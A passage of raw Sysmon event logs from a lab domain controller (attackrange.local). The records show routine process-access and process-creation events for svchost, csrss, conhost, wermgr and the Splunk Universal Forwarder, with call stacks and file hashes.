Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-3E00-000000008801}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.566{D28789B6-7C74-5FA1-3C00-000000008801}38883892C:\Windows\system32\cmd.exe{D28789B6-7C74-5FA1-3E00-000000008801}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.561{D28789B6-7C74-5FA1-3E00-000000008801}3932C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7C74-5FA1-3C00-000000008801}3888C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C74-5FA1-3D00-000000008801}38963916C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-3C00-000000008801}3888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-3D00-000000008801}3896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-3C00-000000008801}3888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.536{D28789B6-7C73-5FA1-3300-000000008801}26762736C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C74-5FA1-3C00-000000008801}3888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.537{D28789B6-7C74-5FA1-3C00-000000008801}3888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-3B00-000000008801}3864C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.456{D28789B6-7C64-5FA1-1000-000000008801}11442996C:\Windows\system32\svchost.exe{D28789B6-7C74-5FA1-3B00-000000008801}3864C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wer.dll+6e008|C:\Windows\System32\wer.dll+37360|C:\Windows\System32\wer.dll+3866c|C:\Windows\System32\wer.dll+13ae4|C:\Windows\System32\wer.dll+51b6|c:\windows\system32\wuaueng.dll+d4e38|c:\windows\system32\wuaueng.dll+554a8|c:\windows\system32\wuaueng.dll+4e24b|c:\windows\system32\wuaueng.dll+4e49b|c:\windows\system32\wuaueng.dll+4e5fe|c:\windows\system32\wuaueng.dll+4fb28|c:\windows\system32\wuaueng.dll+5c36f|c:\windows\system32\wuaueng.dll+4d1d5|c:\windows\system32\wuaueng.dll+4c805|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 